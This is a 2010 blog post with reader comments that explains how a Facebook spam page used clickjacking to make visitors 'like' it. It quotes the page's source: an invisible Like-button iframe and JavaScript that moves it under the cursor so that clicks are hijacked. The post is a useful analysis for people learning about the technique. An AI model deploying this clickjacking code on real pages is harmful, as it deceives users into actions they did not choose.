“Smoking Hot Bartenders” is Some Smoking Hot Facebook Spam
Yesterday I noticed a ton of my friends on Facebook were “liking” :|:|:|:|:|:| Smoking Hot Bartenders 
:|:|:|:|:|. Noticing that even some friends who I would never think would like that (girls), I decided to click on it and take a look.
The “Smoking Hot Bartenders” site, of course, is some sort of spam site where the user is prompted to fill out some leadgen form (or offer) in order to access pictures of the “smoking hot bartenders”. Declining to do so, I closed the window and figured that was that.
I was quite surprised to check my feed today and notice that I had “liked” the same page on Facebook. How did this happen?
I decided to take a look at the site, http://cutebabesbartending.info/, and see how they were executing this very viral scheme.
The first thing you see when you land on the site, most likely from Facebook (and hence logged in), is a screen with some hot girls and a link to click through. This link is the key to the scheme.
Taking a look the source of the page we see:
<h2>
<a href="photos.html">Continue here to see photos</a>
</h2>
<div style="overflow: hidden; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="aaaa">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fcutebabesbartending.info%2F&layout=standard&show_faces=true&width=450&action=like&font&colorscheme=dark&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:20px; height:20px;" allowTransparency="true" id="xxx" name="xxx"></iframe>
</div>
Note we have here an absolutely positioned DIV with an IFRAME to the facebook like page. But where is the code that clicks the link? If they are triggering from the click why does this facebook like button fire? Check out the code below. Note that id xxx is the iframe itself, and aaaa is the facebook like button.
<script>
var xxx = 0;
var aaaa = document.getElementById('aaaa');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body
function lololol(e){
if (window.event) {
aaaa.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
aaaa.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else {
aaaa.style.top = (e.pageY-5)+'px';
aaaa.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (xxx == 0) {lololol(e);}
}
</script>
This is kind of ingenious: they are re-drawing the Facebook like button so it follows your mouse around the screen, and when you click on the link you click on both the like button and the link to the next page!
But why don’t you see the like button? It’s because the opacity of the parent element is set to 0 (ie completely transparent, thanks to commenter Colby Russell for correcting me). Let’s change this and see what happens:
Look at that Facebook like button there by my cursor!
This is fairly brilliant spam – you click off of Facebook and unsuspectingly click on the link to get to the page where you assume there might be spam but you can ignore it. However, unbeknownst to you, you’ve already “liked” the spammy page, and it’s now sitting in your feed waiting for the next sucker, er… friend, to click on it.
Updated: commenter Ryan King notes that the term for this spammy technique is Clickjacking.
Thank you! I got suckered into clicking that button too. Bastards!
tele-mon
25 Aug 10 at 7:28 pm
Button? What button? All I see is boooooooooobs!
Robin Berjon
26 Aug 10 at 7:50 am
how the hell do i unlike it????
cmizz
26 Aug 10 at 8:41 am
Is it just spam or is it a virus too?
Joe
26 Aug 10 at 8:44 am
As far as I can tell (on my mac) it’s not trying to install any file which might have a virus in it, but it’s possible that they’re sniffing browser useragent on the server side and trying to deliver something to windows machines.
Most likely, however, they are just trying to spread virally via facebook so they can get more people to fill out their leadgen forms on the second page and hence make more $$$.
Simon
26 Aug 10 at 8:55 am
Any way to remove it from news feed?
cmizz
26 Aug 10 at 9:19 am
Yep, just go to your news feed (tip: click your name from your facebook “home” page), and then under recent activity you should see “… liked smoking …” Hover over the text and you’ll see a “Remove” link to the right (which will actually be just text), and if you hover over that becomes a button to remove the post.
Simon
26 Aug 10 at 9:24 am
[...] me here. Maybe I should have asked Jeeves.
More helpfully, this link probably explains it: “Smoking Hot Bartenders” is Some Smoking Hot Facebook Spam – Simon's Corner o… __________________ Feedback | YouTube Channel | Squid 2 Shark [...]
Smokin Hot Bartenders on Facebook - mcarterbrown.com
26 Aug 10 at 12:44 pm
You have way too much time on your hand you FaceBook guru.
Sha Coonie
26 Aug 10 at 2:11 pm
tried to ‘unlike’ this page, and remembered that all pages you “like” show up in your “info” tab under your profile. looked through all the subsections, including “other” and it doesn’t show up. I had already removed it from my feed, but I didn’t think that would “unlike” something I’d legitimately clicked on. I’m wondering if this thing really just writes code to make the line appear in your feed, or if it actually is a legitimate “like” and it’s hidden somewhere in your profile so you can’t “unlike” it?
Wylie
26 Aug 10 at 6:58 pm
[...] “Smoking Hot Bartenders” is Some Smoking Hot Facebook Spam … [...]
from SC is this a love story ..A drunk walks into a bar and notices a banner that says? | servicesbrisbane.com.au
26 Aug 10 at 7:07 pm
This is called clickjacking: http://en.wikipedia.org/wiki/Clickjacking
ryan
26 Aug 10 at 7:23 pm
opacity: 0;would mean it’s completely transparent―i.e., you can see through it. If it were perfectly opaque, you would be able to see it, because you wouldn’t be able to see through it at all. It’s just weird, because you linked to the definition and everything.Colby Russell
26 Aug 10 at 7:57 pm
Thanks Colby for correcting me – I meant perfectly transparent, of course, but I my mind misfired
Simon
26 Aug 10 at 8:03 pm
I’m using Windows XP with security beefed up Mozilla Firefox browser, and I think the likes of NoScript would have probably picked this up and alerted me… I don’t know about any tools for the mac, but guess this plug in works there as well.
Steve
26 Aug 10 at 8:06 pm
This was old in 2008. Nowadays Is not brilliant at all.
http://hackademix.net/2008/10/08/hello-clearclick-goodbye-clickjacking/
required
26 Aug 10 at 8:28 pm
Awesome..that is one he’ll of a spamming
Machbio
26 Aug 10 at 8:47 pm
i got this virus on my facebook too. please tell me how i get rid of it. my friends at work all can see
boris kukuru
26 Aug 10 at 9:24 pm
[...] “Smoking Hot Bartenders” is Some Smoking Hot Facebook Spam … [...]
How Acupuncture Can Help You to Quit Smoking | Helps Heal Disease Solutions
26 Aug 10 at 9:51 pm
@boris – see my comment above about how to remove the “like” from your FB feed..
Simon
26 Aug 10 at 10:42 pm
[...] in Uncategorized Adam retweeted this article from @newsycombinator a 2 hours ago. Since I’m taking an afternoon break from in the summer [...]
“Smoking Hot Bartenders” archive exposed « Anhang's Contemplations
26 Aug 10 at 10:51 pm
[...] a transparent like button that follows the cursor, but I noticed this one got caught on hackernews: http://www.liquidrhymes.com/2010/08/…facebook-spam/ As it's gotten this much popularity I'm not sure if they'll do something about it, so I can't [...]
Auto-like technique caught - Black Hat Forum Black Hat SEO
26 Aug 10 at 11:09 pm
For those who actually want the photos – the archive is totally public. http://bit.ly/csr0hA
Anhang Zhu
26 Aug 10 at 11:10 pm
That is smart, ermmm.
jantanhebat
26 Aug 10 at 11:52 pm
Ingenious !!!
Congratulation !!!
seoguide
27 Aug 10 at 6:44 am
that is genius!
jamie dalgetty
27 Aug 10 at 6:53 am
Seriously, that’s all it takes? No unique token or POST form to prevent this sort of trickery? Man, Facebook wouldn’t know security if it slapped them in the (ahem) face.
⬡
27 Aug 10 at 9:04 am
I never thought I would see someone use the term “brilliant spam” :/
JZ
27 Aug 10 at 10:39 am
Those sneaky buggers, nice find Simon. The one thing I don’t get, is how they appeared to make one click into a facebook iframe also lead to clicking the other link (or at least triggering some code to load a new url)? I’d look closer at their page, but it looks like they’ve already changed it? The cross-domain security restrictions between iframes seem like they’d prevent something like that…
Peter Coles
27 Aug 10 at 10:45 am
old trick and not dangerous
jacka
27 Aug 10 at 11:11 am
@Peter Coles- that’s a great point re: getting the base page link to fire, and now I wish I had figured that out too. I tried to check my browser’s cache, but I forgot I threw it into private browsing before analyzing their shady site..
Simon
27 Aug 10 at 11:19 am
This is exactly why I now run facebook on a totally separate browser than my por — other sites.
aaasglk
27 Aug 10 at 11:56 am
[...] liking a page that said “:|:|:|:|:| Smoking Hot Bartenders
:|:|:|”, as described Simon Mosk. Once clicked, users were prompted with the site [...]
Reblogs for 20100828 — AlexWeber.is
28 Aug 10 at 9:00 pm
[...] importantly, DO NOT CLICK ON ANYTHING ON THAT PAGE. Some developers managed to implement an ingenious hack that’ll redraw the Like button and follow your mouse around effectively making the whole page [...]
Wherever I May Roam… » On Facebook Malware
19 Dec 10 at 5:41 pm